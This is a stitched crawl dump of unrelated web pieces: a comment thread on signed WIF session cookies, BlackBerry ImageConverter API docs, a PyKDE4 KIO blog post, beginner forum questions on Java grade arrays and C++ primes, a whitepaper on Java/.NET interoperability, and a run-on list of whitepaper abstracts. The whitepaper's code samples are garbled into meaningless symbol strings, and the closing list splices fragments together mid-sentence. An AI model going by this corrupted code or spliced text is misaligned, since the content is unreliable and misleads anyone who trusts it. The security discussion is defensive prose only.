key. If we would just encrypt, a crafty client could just discard the session cookie, create a new one with super-privileges in the claims and encrypt it with the RP certificate. If encryption would be the only requirement, the RP would not be able to tell the difference. Adding the signature successfully prevents this attack, as it requires a private key which is not available to the client or anybody else but the RP itself. The new transformations list is assigned to a new SessionSecurityTokenHandler instance, which is then used for overriding the existing session handler: from now on, all session cookies will be handled using the new strategy. That’s it! As long as you remember to add an entry for the service certificate in the RP configuration, you’ve got NLB-friendly sessions without having to resort on compromises such as sticky sessions. Thanks for excellent post. I will try this out. Great post. I would like to point out one caveat when doing sliding expiration in SessionAuthenticationModule_SessionSecurityTokenReceived. If your asp.net code uses asp.net impersonate via web.config (ours did) and touches any windows secured resource in this event (i.e. sql), it will happen under the identity context of the app pool user and not the asp.net impersonated user. We found this out the hard way and had to ditch using asp.net impersonation and switch to just setting our app identity on the iis application pool. Would be nice if the W.I.F. docs / samples mentioned something to this effect. Hi Vitorrio. I'm using .Net 4.5 and I was wondering if these solutions would be any different with the new Framework? Can you point me in e right direction?
https://blogs.msdn.microsoft.com/vbertocci/2010/06/16/warning-sliding-sessions-are-closer-than-they-appear/
CC-MAIN-2016-50
en
refinedweb
ImageConverter Since: BlackBerry 10.0.0 #include <bb/utility/ImageConverter> To link against this class, add the following line to your .pro file: LIBS += -lbbutility Encodes and decodes images to and from different sources in various formats. Images may be stored in memory or stored in local files. Images formats are denoted using mime types, such as "image/png", "image/jpeg", and so on, or by the file extension of a given path, such as ".png", ".jpg", and so on. The list of supported formats depends on the codecs that are installed on a device at a particular time. You can use img_codec_list(), which is part of the C library, to get a complete list of installed codecs. For more information on C APIs, see. Here's how to use the ImageConverter class to decode a PNG image: ImageData image = ImageConverter::decode("foo.png"); In addition to decoding images, this class also contains functionality for encoding images into a specific format (PNG, JPEG, and so on). Overview Public Functions Index Static Public Functions Index Public Functions Creates a new instance of the ImageConverter class. BlackBerry 10.0.0 Destructor. BlackBerry 10.0.0 Static Public Functions ImageData The newly created ImageData. If the image could not be loaded, ImageData::isValid() will return false. BlackBerry 10.0.0 ImageData The encoded data can be in any number of formats (PNG, JPEG, and so on). The newly created ImageData. If the file could not be loaded, ImageData::isValid() will return false. BlackBerry 10.0.0 QByteArray Converts an image into an encoded format (PNG, JPEG, and so on). The encoded image data. If the image could not be encoded, the returned QByteArray will be empty. BlackBerry 10.0.0 bool Converts an image into an encoded format (PNG, JPEG, and so on). true if the image was encoded successfully, false otherwise. BlackBerry 10.0.0 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
https://developer.blackberry.com/native/reference/cascades/bb__utility__imageconverter.html
CC-MAIN-2016-50
en
refinedweb
The world of KIO metadata - checking the HTTP response from a server Recently, had one problem: how could I check the HTTP response? I knew already that the various ioslaves can store metadata, consisting of key-value pairs which are specific on the slave used. Normally you can get the whole map by accessing the metaData function of the job you have used, in the slot connected from the result signal. For some reason, however, in PyKDE4 calling metaData() triggers an assert in SIP, which ends in a crash (at least in my application; I stil need to debug further). KIO jobs have also the queryMetaData function, which returns the value of the key you have queried. Unfortunately, there was no way I could find the name. DESIGN.metadata (link is for the branch version). After checking with webSVN, that was exactly the thing I was looking for! It lists all the keys for the metadata, indicating also to which ioslave they begin. After that, the solution was easy. Of course I’m not leaving you hanging there and now I’ll show you how, in PyKDE4, you can quickly check for the server response: [python] from PyKDE4.kio import KIO from PyQt4.QtCore import SIGNAL […] class my_widget(QWidget): […]) [/python] This snippet does a few things. Firstly, it gets the specified URL, using KIO.get (KIO.stat doesn’t set the required metadata). Notice that the call is not wrapped in the new-style PyQt API because result (KJob *) isn’t wrapped like that (there’s a bug open for that). In any case, the signal passes to the connecting slot (slot_result) where we first check if there’s an error (perhaps the address didn’t exist?) and then we use queryMetaData(“responsecode”) to get the actual response code. If you want to do error checking basing on the result, bear in mind that KIO operates asynchronously, so you should use a signal to tell your application that the result is what it expected or not. I wonder if this should be documented in Techbase… Luca Beltrame KDE · LINUX KDE Linux python
https://www.dennogumi.org/2010/02/the-world-of-kio-metadata-checking-the-http-response-from-a-server/
CC-MAIN-2016-50
en
refinedweb
Hey Guys, I am a new student to Java and I am working on an assignment for school. I am not looking for anyone to do my work for me, just some guidance on what I can do to fix the problem. I have done research on this issue on google and visited various sites without getting the information I am looking for. I have contacted my professor as well, but he is usually very slow at responding to my questions. I am running out of time for this assignment and I would like to fix this bug before submitting the assignment. Okay, now that the formalities are out of the way, here is the code that I have written thus far: import java.util.Scanner; public class CalculateGrade { public static void main(String[] args) { //main method calls AssignvalueToArray method, and AssignValueToArray method calls //DisplayvalueInArray method //create a Scanner object for input Scanner keyboard = new Scanner(System.in); System.out.print("Enter the number of students: "); int studentNum = keyboard.nextInt(); System.out.println(); System.out.print("Enter the number of Exams: "); int studentExamNo = keyboard.nextInt(); AssignValueToArray(studentNum, studentExamNo); } //This method assigns students' scores to a two dimensional array public static void AssignValueToArray(int studentNumber, int numberOfExam) { int[][] studentScore = new int[studentNumber][numberOfExam]; Scanner keyboardForArray = new Scanner(System.in); int studCount = 1; for (int index = 0; index < studentNumber; index++) { System.out.println ("Please type in student " + studCount + " 's grades: " ); for(int indexOfExam=0; indexOfExam < numberOfExam; indexOfExam++) { studentScore[index][indexOfExam] = keyboardForArray.nextInt(); studCount++; } DisplayvalueInArray(studentScore); } } //this method displays student score in the two dimensional array public static void DisplayvalueInArray(int[][] studentScoreArray) { System.out.println ("The students' scores are: " + "\n"); int studentCount = 1; for (int index = 0; index < studentScoreArray.length; index++) { System.out.print("Grades for student " + studentCount +": "); for (int indexOfExam = 0; indexOfExam < studentScoreArray[index].length; indexOfExam++) { char letterGrade; if (studentScoreArray[index][indexOfExam] <= 59) { letterGrade = 'F'; } else if (studentScoreArray[index][indexOfExam] >= 60 && studentScoreArray[index][indexOfExam] <=69) { letterGrade = 'D'; } else if (studentScoreArray[index][indexOfExam] >= 70 && studentScoreArray[index][indexOfExam] <=79) { letterGrade = 'C'; } else if (studentScoreArray[index][indexOfExam] >= 80 && studentScoreArray[index][indexOfExam] <= 89) { letterGrade = 'B'; } else letterGrade = 'A'; System.out.print(studentScoreArray[index][indexOfExam]+"\t"); System.out.print(letterGrade); } System.out.println(); studentCount++; } } } The purpose of this program is to take the number of students and number of exams from the user, as well as the number grades, and then output the students grade and letter grade when the user has finished inputting the data. The problem I am running into is when I input more than one students grades I get this as the output: Enter the number of students: 2 Enter the number of Exams: 2 Please type in student 1 's grades: 88 75 The students' scores are: Grades for student 1: 88 B75 C Grades for student 2: 0 F0 F Please type in student 3 's grades: After I insert student three's grades I get this output: Please type in student 3 's grades: 66 88 The students' scores are: Grades for student 1: 88 B75 C Grades for student 2: 66 D88 B So, it skips the third students grades, but outputs the grades as student two's. I am not sure if this bug is being caused within the array or when the program gets the letter grade from the inputted number grade. Any help you guys can give me on this problem would be much appreciated and thank you all in advance.
https://www.daniweb.com/programming/software-development/threads/371372/java-two-dimensional-array-problem
CC-MAIN-2016-50
en
refinedweb
0 Hello to everyone, i recently started to learn c++ with this book "Jumping into C++" from Alex Allain. In this book there is an example of a program to get the prime numbers from 0 to 100 that Im not understanding! For what I think I understood the second loop of the function "isprime" is going to try to divide from 2 to the number generated by the first loop in function "main" with the modulus operator from the function "isDivisible", a prime number is a number that only as its self and 1 as divisors, but how can the modulus operator "see" what numbers have only them selfs and 1 as divisors? If someone could explain the steps of this program to me I would be very grateful. Heres the code: #include <iostream> // note the use of function prototypes bool isDivisible (int number, int divisor); bool isPrime (int number); using namespace std; int main (){ for ( int i = 0; i < 100; i++ ){ if ( isPrime( i ) ){ cout << i << endl; } } system("pause"); } bool isPrime (int number) { for ( int i = 2; i < number; i++){ if ( isDivisible( number, i ) ){ return false; } } return true; } bool isDivisible (int number, int divisor){ return number % divisor == 0; } Edited 3 Years Ago by guilherme.carvalho.9250
https://www.daniweb.com/programming/software-development/threads/442634/doubt-about-getting-prime-numbers-0-to-100
CC-MAIN-2016-50
en
refinedweb
Q: So be honest, I promise I won t tell anybody: Which one do you like best? Java or.net? - Norma Matthews - 1 years ago - Views: Transcription 1 Whitepaper by Ted Neward, Spring 2007, InfoQ.com/j+n For almost a half-decade now, since the release of Microsoft s.net Framework, as one of those few experts fluent in both the Java/J2EE and.net platforms, I ve been speaking on the topic of Java/.NET interoperability. And regardless of the venue or the audience, one question (from friends, attendees and consulting clients alike) continues to appear at the top of the Frequently Asked Questions list for this topic: Q: So be honest, I promise I won t tell anybody: Which one do you like best? Java or.net? I don t have a favorite; I love them both the same. To be honest, it s not an entirely truthful answer, so it s time to come clean, and go on the record as to which one I prefer. A: It depends. A deep divide has fallen across our industry around the basic question of Which platform do you use? Are you a Java developer, or a.net developer? By the tone of some of the discussions held on this topic, one might think this is the major discussion topic of the day, complete with flaring tempers and heated discourse to match. Forget the classic debates of eminent domain vs imperial aggression, or those issues the mainstream media thinks important, like the growing instability in Iraq or the Horn of Africa if we measure the emotional energy involved, clearly the world s first and most important issue is that of whether you spend the majority of your programming time in Eclipse or Visual Studio. The truly ironic thing about these debates, interestingly enough, is that they re entirely pointless Java and.net, while strikingly similar on several points, are in fact two entirely distinct and different platforms, each with their corresponding strengths and weaknesses. Each platform developed (or evolved) in accordance with the community and culture around it, and as such, each platform looks to solve different problems, in different ways, using different approaches. What s more, the platforms themselves have begun to diverge in recent years.? 2 While a full listing of all the possible integration scenarios between these two incredibly rich platforms is beyond the scope of this paper, we can examine a few compelling ideas, and explore them both in concept and in code. Probably the most common example offered of Java/.NET interoperability is the ubiquitous Web service, typically with a Windows Presentation Foundation or WinForms front-end, using Windows Communication Foundation to do the actual work of transferring the data to the Java Web Service waiting on the other end, typically hosted in some kind of Java container, be it WebLogic or WebSphere or Spring or Tomcat or something similar. The pains and pleasures of building Web services are well-documented elsewhere, so it serves no purpose to repeat them in detail here; suffice it to say, however, that treating Web services as an extension of CORBA or.net Remoting (that is to say, as a distributed object technology) will generally lead to greater work and effort than is necessary. Services, when used properly, create looser coupling than the distributed object toolkits they seek to replace, specifically to make it easier to pass across technology boundaries such as the one we re discussing. Both WCF and JAX-WS have been written with the notion of passing messages, not objects at their core, despite the surface-level APIs that would make them seem more like RMI or.net Remoting, making each a good choice for building Web services that will interoperate well. The obvious advantage of this scenario is that each technology focuses on the parts that it does well: the front-end is delivered via a technology that is particular to the platform and can thus take full advantage of its capabilities, and the back-end is written in a platform that has earned a reputation for performance and scalability. With the release of SQL Server 2005 came a new messaging implementation, SQL Server Service Broker, to use in building message-based communication applications. Implemented on top of SQL Server s database engine (the queues in Service Broker are effectively tables with a thin veneer on top of them) and taking full advantage of that robustness to provide transactional and ordered delivery guarantees, Service Broker offers developers a compelling messaging platform, particularly in those data centers where a database is already present. Accessing Service Broker from Java, however, is not that much more difficult than any other sort of JDBC-based access against SQL Server. A Java application be it a client app or another serverbased processing engine can access Service Broker through the Microsoft SQL Server 2005 JDBC driver (available for free download from MSDN) and either send messages to a Service Broker service, or receive messages from a Service Broker service, as necessary. In this example, a fictitious apartment complex wants to Web-enable the generation of work orders for its maintenance personnel, so that renters needn t call the office to place a ticket (and thereby take up valuable office personnel time filling out paper forms in triplicate; office personnel have enough of a hard time ignoring tenants as it is). As such, the solution provider has built a very simple and lightweight Web-based system with two JSP pages: one for renters to place tickets into the service, and a second for maintenance personnel to gather the tickets up and view them. The intent of the system is simple: the first JSP form takes the 3 ticket information, such as the description of the problem, the apartment itself, the tenant s name and phone #, and so on, and queues that information into a ServiceBroker queue, where it resides until Maintenance staff access the second JSP form to get a list of pending work to be done. Speaking to the implementation, in many respects, from the Java perspective, working with ServiceBroker is not much different from working with any other JDBC-fronted database; to put messages into the queue requires only a JDBC call into the SQL Server instance, much as a traditional INSERT or UPDATE would be written:!!""#$$%&'(%) *+%,-..-/ %0(%123 23%2% 4252%() *% %( ) 5(7%(82%2-) 47%(82%99) % 7 7 8%( ) /+(: )9,:3- Fetching a message from the queue is similarly straightforward, using the SQL Server RECEIVE keyword: (%%28%04 ;<0&.) ;#5(7) :: (:,::< /#, = :/!) A A reasonable question would center around the use of SQL Server s Service Broker here, instead of a more Java-friendly JMS implementation, such as the open-source ActiveMQ or commercial SonicMQ implementations. While it would be easy to fall back on the usual Java/.NET interop answer, We do it because we have to, there s a more compelling reason here: conversations. ServiceBroker provides a new feature as yet unseen in the JMS specification, that of the conversation : similar in some ways to transacted message delivery, a conversation represents a sequence of messages back and forth, and carries a unique identifier for each conversation. In essence, it s a halfway point between a flurry of RPC calls and independent, individually-tracked messages. It provides for a degree of reliability and robustness not typically found in messaged communication systems. Although in our fictitious example above, the use of conversation is somewhat arbitrary, it can be particularly powerful in longer-running business processes. The conversationid identifier, in the code above, is unique across the ServiceBroker instance, and identifies this collection of messages (just one, in this case) for this particular user interaction. 4 Another reasonable question would center around the use of JSP as the web front-end in place of ASP.NET; again, while it would be tempting to simply cite a have to reason such as using non- Windows platform to host the Web tier, JSP offers a compelling reason in its own right, in that there is a wealth of tools and prebuilt componentry for producing nice-looking Web applications. If we extend the discussion to all of the Java/Web space, tools like Struts, Seam, WebWork, JSF, Google Web Toolkit, and more make the Web development experience distinctive from the traditional dragand-drop approach offered up by ASP.NET. (While drag-and-drop may work for inexperienced Web developers, practiced Web designers have usually found their own approaches they prefer, and find that ASP.NET s design practices clash with their own.) For a more detailed discussion of SQL Server Service Broker, please see A Developer s Guide to SQL Server 2005 by Beauchemin and Sullivan. For a more detailed discussion of Servlets and JSP, see Java Servlets and Java Server Pages by Jayson Faulkner and Kevin Jones. For a more detailed discussion of JDBC, see The JDBC Tutorial and API Reference, Third Edition, by Fisher, Ellis and Bruce. Though it may pain some of the more zealous open-source advocates to hear this, Microsoft Office represents, without a doubt, the world s most popular office productivity suite over the last decade. In many respects, it is the most-installed piece of software in the world, second perhaps only to Windows itself. For a few years now, the Java community has discussed richer client applications, moving away from the click-wait-read cycle of systems built around the Web and towards a more interactive style of user interface. AJAX certainly enables some of this, at the (sometimes prohibitive) cost of having to write potentially complex scripting code to deal with different browsers and browser versions. Some in the Java community have posited the Eclipse Rich Client Platform as a solution, others push JavaWebStart, or Adobe Flex, and so on. The best rich client is the one based on the software already pre-installed on the end-user s machine. Given that Office is almost always preinstalled, particularly on machines within a corporate environment, why not use the incredible extensibility interfaces in Office, and use Office as the rich client, with Java as the back end? Whole forests have been clear-cut in order to produce the myriad books, papers, tutorials and reference documentation on the Office object model and how to use it, both from.net and unmanaged COM, so duplicating that information here would be counterproductive. Instead, this paper will focus on a single part of Office s extensibility model, that of the Smart Tag, and in particular, the Smart Tag List, a predefined Smart Tag that uses an XML definition file to recognize text in an Office document (typically Excel or Word, though PowerPoint and Access are also able to use Smart Tag Lists) and offer a small drop-down menu that will lead users off to a Web site. In this case, the fictitious scenario is simple: an online e-tailer has found their online pet shop to be wildly successful (having finally solved the problem of shipping pets through surface mail by negotiating deals with local pet shops around the world), and their portal, based on the Spring JPetStore example, now needs to handle all sorts of complex calculations and business rules as defined by the accountants and marketers within the company. The simple orders are easily left to the portal, but more complex orders will be handled by salespeople, either in person or over the phone. 5 Complex calculation rules demand a complex processing language to handle them, and this is exactly the kind of scenario that Excel was created for in fact, both the accountants and marketers can write the rules in Excel s formula language themselves and so we want to take the next step of enabling the Excel spreadsheet to act as the front-end to the Spring portal. In this case, the first step is simply to recognize the order and product numbers in the Excel document, and display a Smart Tag that takes the salesperson over to the appropriate page on the Spring-powered Website. (Future enhancements could automatically place the order when the spreadsheet is saved, or pop warning messages when trying to sell pets that the store is currently out of, and so on.) Doing this is actually more an exercise in writing a simple XML file than it is in writing Java or.net code; thanks to the flexible nature of URLs, the smart tag list can remain blissfully unaware of the fact that the website behind the URL is implemented in Spring. The Smart Tag List document, shown below, even refreshes itself every day, on the grounds that new product IDs may come available ( Look, kids, we now stock ferrets! ). 6 ?5!,!5#-!""#"" E' H <-:!#H/H!! J-H 5HKHC>.5HKHCB.52H5LHC>.52H5LHCB.('H2HCB.('H HC>?5!:!#H/H!! J-H @?5! <-:!#H/H!! Picking this apart briefly, we re essentially setting up two smart tags, one to recognize the Product IDs (FL-DSH-01, and so forth), and a second to recognize Item IDs (EST-16, EST-17, etc). In each case, we simply surf over to the website, passing the ID in place of the {TEXT} placeholder in the URL. Here, the IDs are hardcoded, but notice how the <updateurl> tag lists a.jsp page the JSP code there queries the underlying database for all Product and Item IDs and lists them out when it sends back a new copy of this Smart Tag List document (which Office will silently copy over the original, located in the C:\Program Files\Common Files\Microsoft Shared\Smart Tag\Lists directory). Office knows to update this Smart Tag List every 5 minutes, because the Smart Tag List defines itself to be updateable (as given by both the <updateable> and <autoupdate> tags above), and that it should query for an update every 5 minutes (as given by the <updatefrequency> tag). This means that, silently, the smart tag will update itself as new products and items are introduced into the database, without any manual user intervention required. 7 Smart tags are far more powerful than this simple example leads us to believe; the Visual Studio Tools for Office API allows the.net developer to write any sort of code behind a smart tag desired, so it s not infeasible to imagine issuing a remote call (whether a Web Service call or through a commercial toolkit, such as JNBridge or ZeroC s ICE) to the JPetStore engine to obtain current inventory counts at the time of the smart tag s activation, and so on. Additionally, smart tags are hardly the end of Office s integration capabilities; the document pane can be customized to provide another user interface into any Java system, Excel s formula language can be extended by custom formulae (which, of course, could either host the JVM locally to make use of Java APis or else call out to Java systems to do the same), and so on. And this need not all go one way if desired, Word or Excel itself can be hosted inside of the Eclipse RCP, as can any COM Automation object, where all of the features of Word and Excel will still remain available. Certainly, these aren t the only scenarios possible, just the few that came to mind during recent discussions and client meetings. Other scenarios include: PowerShell using Cmdlets that speak to Java. PowerShell is poised to become the most important administration tool for Windows for the near future, and it would be a relatively trivial exercise to build a set of Cmdlets that interrogated Java servers using JMX. This would make it possible simple, even to build scripts that checked both the status and performance of IIS- and Javabased servers with a single script, commingling the results into a nice graph (such as those produced by the cmdlets from PowerGadgets), or to be able to turn on and off various parts of the system via method calls. Java using Speech Server. Vista has some new speech synthesis capabilities, and Microsoft s Speech Server offers some powerful speech-analysis capabilities that currently don t exist in the Java platform. As we become more aware of physical disabilities in our users, speech and interacting with users through voice (whether over a phone or through a microphone in front of the computer) becomes more and more attractive. Workflow activities calling Java. Windows Workflow has a prebuilt activity that calls out to a Web service already, but, as mentioned earlier, Web services are useful under certain circumstances, but are hardly a panacea for all interoperability tasks. Custom activities could make use of other Java/.NET interoperability approaches to talk to Java components. Java hosting Workflow. One of the most powerful facets of the Workflow engine is its ability to be hosted in a variety of environments, such as ASP.NET. Certainly, there s no reason why the Workflow engine couldn t be hosted inside of a Java process, such as Tomcat or Jetty, thus enabling Workflow s information worker accessibility to reach out to both Java and.netbased web applications. Windows Mobile devices interoperating with Java. As the mobile device world heats up, Microsoft s Windows Mobile platform stands as a viable platform for writing software to run on mobile devices, such as the Smartphone. As these devices become more ubiquitous, it s natural that IT departments will want to integrate them into their already-heterogeneous environments, which means Java will likely be involved. Sometimes this communication will be over Web services, but in some situations a more focused communication method will be necessary, such as using a proprietary toolkit like JNBridge Pro or ZeroC s ICE. As more and more developers come to realize the power of using both.net and Java together, more scenarios will likely come to light. And as both the Java and.net communities come out with more innovative ideas, these will create even more reasons for each side to openly and honestly consider 8 how to use the other to best solve our clients problems. Because, after all, in the end, regardless of which technology you love more, that s what we re about: providing solutions to our clients.!! Ted Neward is the principal of Neward & Associates, a consulting group that focuses on enterprise systems using Java,.NET, XML, and other tools as necessary. He has been using C++ since 1991, Java since 1997, and.net since, and can be found on the Web at ) Java and.net represent the extensive share of enterprise development. At we are hosting and continually posting that will help you learn how. This whitepaper was produced for the InfoQ Java +.NET portal.! * +,$ It s important to acknowledge that readers of this paper will generally have experience and knowledge of one of the two sides, not both. For that reason, a laundry list of the major components of both platforms appears below. This isn t intended as any sort of overview of explanation of those components, nor is it an exhaustive list; readers are encouraged to consult the Bibliography at the end of this paper for more on each topic. Java: Java 5 Enterprise Edition. Recently renamed from its former moniker Java2 Enterprise Edition and still commonly referred to as J2EE, this specification is an umbrella specification, bringing together dozens of other enterprise-scope specifications. Although incorrect, many use the term J2EE as synonymous to EJB. Enterprise JavaBeans (3.0). EJB is a specification describing a container into which software components seeking lifecycle, connection and distributed transaction management are deployed. It is fair to characterize EJB as the logical Java successor to transaction-processing mainframe systems. JDBC (4.0). The Java standard call-level interface API to relational database implementations. Different vendors provide different providers (drivers) which implement the JDBC API, thus allowing the programmer to remain ignorant (and, theoretically, loosely-coupled) to the actual database implementation. Servlets (2.5). The Servlet specification describes a container into which software components designed to build dynamic HTTP/web pages are deployed. A Servlet is essentially a Java class extending a particular interface. Java Server Pages (2.2). JSP pages are an output-oriented way to create servlets, similar in the way that ASP or ColdFusion pages look. JSP files are then translated into Java source (servlets) and compiled. Remote Method Invocation. RMI is Java s object remote-procedure-call (ORPC) stack. RMI has two flavors, one using a native Java wire format, called RMI/JRMP, and the other using 9 OMG s CORBA wire format, called RMI/IIOP. Officially, J2EE systems are encouraged to use RMI/IIOP, but in practice RMI/JRMP use is more widespread. Java Message Service (1.1). JMS is an API for standard access to any messaging service (not to be confused with service) for the Java platform. JavaMail. JavaMail is an API for standard access to any (SMTP, POP3, IMAP, and so on) service. Java Naming and Directory Interface. The standard Java API for any service that provides naming and/or directory services, such as LDAP. Java WebStart. A deployment technology where applications can be launched locally from an HTTP URL, and stored on the client machine for future (offline if desired) execution. Java API for XML Binding (2.0). JAXB is the standard API for automated Java-to-XML/XML-to- Java transformation. Java API for Web Services (2.0). JAXWS is the standard API for Java XML-based services. Originally, JAXWS was called the Java API for XML RPC (JAX-RPC), but that name was deprecated in the 2.0 release as JAXWS incorporates a more message-oriented approach. Spring (2.0). A de facto standard open-source container providing lighter-weight services to Java components (also known as POJOs, short for Plain Old Java Objects ). Widely considered the replacement for J2EE. Swing. Officially known as Java Foundation Classes, Swing is a cross-platform user interface toolkit for building rich-client UIs. Because it seeks to create visual consistency across platforms, Swing implements most of its own painting and display logic. Standard Widget Toolkit. The UI technology at the heart of the open-source Eclipse IDE, SWT is another UI toolkit, different from Swing in that it relies on native OS-level UI facilities to do its painting and display logic..net: Windows Communication Foundation. Once code-named Indigo, WCF represents Microsoft s next-generation API for doing any sort of program-to-program communication, from message queuing to secure/reliable/transacted services to WS-* web services. Windows Presentation Foundation. Once code-named Avalon, WPF represents Microsoft s next-generation presentation layer, looking to take advantage of the huge hardware investments the industry has made in graphics cards over the years. WPF code can be used in two forms, either called-and-compiled as per normal.net development, or written declaratively using an XML dialect called XML Application Markup Language (XAML) that can either be compiled into the application or sent over HTTP requests to IE 7 browsers for dynamic display. A subset of WPF, called WPF/E, has been released for use by non-ie browsers. Windows Workflow Foundation. Workflow, as it s commonly called, provides Windows Forms. The.NET wrapper around the traditional Windows UI facilities (User32.dll and GDI32.dll). Active Directory. AD is a directory service intended for enterprise-wide deployment of named resources, such as users and servers. AD also comes in a lighter-weight version for perapplication use called ADAM ASP.NET. The.NET implementation for creating dynamic Web/HTTP facilities. The ASP.NET pipeline provides both programmatic (ASHX) and output-oriented (ASPX) forms for producing end-user visual content, as well as programmatic Web services (ASMX). ADO.NET. The call-level interface API to relational database implementations. Different vendors provide different providers (drivers) which implement the ADO.NET API, thus allowing the programmer to remain ignorant (and, theoretically, loosely-coupled) to the actual database implementation..net Remoting..NET s object remote-procedure call (ORPC) technology. 10 Microsoft Message Queue (4.0). MSMQ is Microsoft s messaging service, available for all recent versions of Windows (4.0 ships with Vista). COM+/Enterprise Services. COM+ is the container providing transaction and lifecycle services into which managed applications (as they were originally known) are deployed..net components use COM+ through the System.EnterpriseServices namespace. Microsoft Office. The world s most widely-installed office-productivity suite, its principal parts consist primarily of Microsoft Word, Microsoft Excel, Microsoft PowerPoint and Microsoft Outlook. Service Oriented Architectures 8 Service Oriented Architectures Gustavo Alonso Computer Science Department Swiss Federal Institute of Technology (ETHZ) [email protected] The context for SOA A bit of history Technical White Paper The Excel Reporting Solution for Java Technical White Paper The Excel Reporting Solution for Java Using Actuate e.spreadsheet Engine as a foundation for web-based reporting applications, Java developers can greatly enhance the productivity LABVANTAGE Architecture 2012 LABVANTAGE Solutions, Inc. All Rights Reserved. DOCUMENT PURPOSE AND SCOPE This document provides an overview of the LABVANTAGE hardware and software architecture. It is written Key Benefits of Microsoft Visual Studio 2008 Key Benefits of Microsoft Visual Studio 2008 White Paper December 2007 For the latest information, please see The information contained in this document represents the current Introduction to apps for Office 2013 Preview Introduction to apps for Office 2013 Preview This document is provided as-is. Information and views expressed in this document, including URL and other Internet Web site references, may change without, Features of The Grinder 3 Table of contents 1 Capabilities of The Grinder...2 2 Open Source... 2 3 Standards... 2 4 The Grinder Architecture... 3 5 Console...3 6 Statistics, Reports, Charts...4 7 Script... 4 8 The Grinder Plug-ins... Betting Big on JavaServer Faces: Components, Tools, and Tricks Betting Big on JavaServer Faces: Components, Tools, and Tricks Steve Muench Consulting Product Manager, JDeveloper/ADF Development Team Oracle Corporation Oracle's Betting Big on THIS IS ONLY SAMPLE RESUME - DO NOT COPY AND PASTE INTO YOUR RESUME. WE ARE NOT RESPONSIBLE [Email ID] [Name] [Contact Number] SUMMARY: 8 years of experience in Requirement Analysis, Design, Development, Testing & Implementation of complete software development life cycle projects for Multi-tier Oracle Mobile Enterprise Application Platform Overview Oracle Mobile Enterprise Application Platform Overview Oracle Tools Product Development The following is intended to outline our general product direction. It is intended for information HPC PORTAL DEVELOPMENT PLATFORM HPC PORTAL DEVELOPMENT PLATFORM Chien-Heng Wu, National Center for High-Performance Computing, [email protected] ABSTRACT In the world of information technology, enterprise applications must be designed, 1Building Communications Solutions with Microsoft Lync Server 2010 1Building Communications Solutions with Microsoft Lync Server 2010 WHAT S IN THIS CHAPTER? What Is Lync? Using the Lync Controls to Integrate Lync Functionality into Your Applications Building Custom Communications 1 What Are Web Services? Oracle Fusion Middleware Introducing Web Services 11g Release 1 (11.1.1) E14294-04 January 2011 This document provides an overview of Web services in Oracle Fusion Middleware 11g. Sections include: What Modern Software Development Tools on OpenVMS Modern Software Development Tools on OpenVMS Meg Watson Principal Software Engineer 2006 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Topics Design and Functional Specification 2010 Design and Functional Specification Corpus eready Solutions pvt. Ltd. 3/17/2010 1. Introduction 1.1 Purpose This document records functional specifications for Science Technology English Math (STEM) Building Business Applications with SharePoint 2010 and Office 2010. October 22, 2010 Building Business Applications with SharePoint 2010 and Office 2010 October 22, 2010 Session Promise (per the Abstract) Office Business Applications (OBAs) are applications that integrate the Microsoft Rich Internet Applications Document Reference TSL-SES-WP-0001 Date 4 January 2008 Issue 1 Revision 0 Status Final Document Change Log Version Pages Date Reason of Change 1.0 Draft 17 04/01/08 Initial version The Server Labs S WHAT IS AN APPLICATION PLATFORM? David Chappell December 2011 WHAT IS AN APPLICATION PLATFORM? Sponsored by Microsoft Corporation Copyright 2011 Chappell & Associates Just about every application today relies on other software: operating Portals, Portlets & Liferay Platform Portals, Portlets & Liferay Platform Repetition: Web Applications and Model View Controller (MVC) Design Pattern Web Applications Frameworks in J2EE world Struts Spring Hibernate Data Service Java Server B. WEB APPLICATION ARCHITECTURE MODELS B. WEB APPLICATION ARCHITECTURE MODELS 1. Web application, what, why and how? 2. N-Tier architecture 3. Historical review of architecture models 4. How does this relate to MVC? 83 B.1 Web application, Porting Legacy Windows Applications to the Server and Web Porting Legacy Windows Applications to the Server and Web About TX Text Control.NET Server: TX Text Control.NET Server is a fully programmable word processing engine for deployment in an ASP.NET server Google Web Toolkit (GWT) Architectural Impact on Enterprise Web Application Google Web Toolkit (GWT) Architectural Impact on Enterprise Web Application First Generation HTTP request (URL or Form posting) W HTTP response (HTML Document) W Client Tier Server Tier Data Tier Web CGI-Scripts. 1 What Are Web Services? Oracle Fusion Middleware Introducing Web Services 11g Release 1 (11.1.1.6) E14294-06 November 2011 This document provides an overview of Web services in Oracle Fusion Middleware 11g. Sections include: Enterprise Integration Architectures for the Financial Services and Insurance Industries George Kosmides Dennis Pagano Noospherics Technologies, Inc. [email protected] Enterprise Integration Architectures for the Financial Services and Insurance Industries Overview Financial Services Curl Building RIA Beyond AJAX Rich Internet Applications for the Enterprise The Web has brought about an unprecedented level of connectivity and has put more data at our fingertips than ever before, transforming how we access information Identity Analytics Architecture. An Oracle White Paper July 2010 Oracle Identity Analytics Architecture An Oracle White Paper July 2010 Disclaimer The following is intended to outline our general product direction. It is intended for information purposes only, and may IBM WebSphere ILOG Rules for.net Automate business decisions and accelerate time-to-market IBM WebSphere ILOG Rules for.net Business rule management for Microsoft.NET and SOA environments Highlights Complete BRMS for.net Integration Distributed Objects and Components Distributed Objects and Components Introduction This essay will identify the differences between objects and components and what it means for a component to be distributed. It will also examine the SharePoint 2013 - Comparison of Features 2013 - Comparison of Features 2013 Features User Authentication and Authorization Foundation 2013 Server 2013 Standard Server 2013 Enterprise User authentication in 2013 is the process that verifies the Interoperating with.net Beyond Web Services Interoperating with.net Beyond Web Services Jeroen Frijters Sumatra Software b.v. [email protected] Jeroen Frijters Interoperating with.net Beyond Web Services Page 1 Overview Full CUSTOM INTERACTIVE VOICE4NET TELEPHONY SOLUTIONS. Contact Center HD. Contact Center HD Contact Center HD (CCHD ) With competition on a global basis, increased demand from users and lingering economic uncertainty, contact centers are a critical component in any company s Microsoft Dynamics AX 2012 Implementation Planning Guide. Microsoft Corporation Published: August 2011 2012 Implementation Planning Guide Microsoft Corporation Published: August 2011 Table of Contents Copyright notice... 3 Implementation planning guide... 6 Architecture and planning... 6 Microsoft Dynamics Database Application Design and Development. What You Should Know by Now Database Application Design and Development Virtually all real-world user interaction with databases is indirect it is mediated through an application A database application effectively adds additional Rich Internet Applications Rich Internet Applications [Image coming] Ryan Stewart Rich Internet Application Evangelist [email protected] Ryan Stewart Flex Developer for 3 years Rich Internet Application Blogger for 2 years STEELCENTRAL 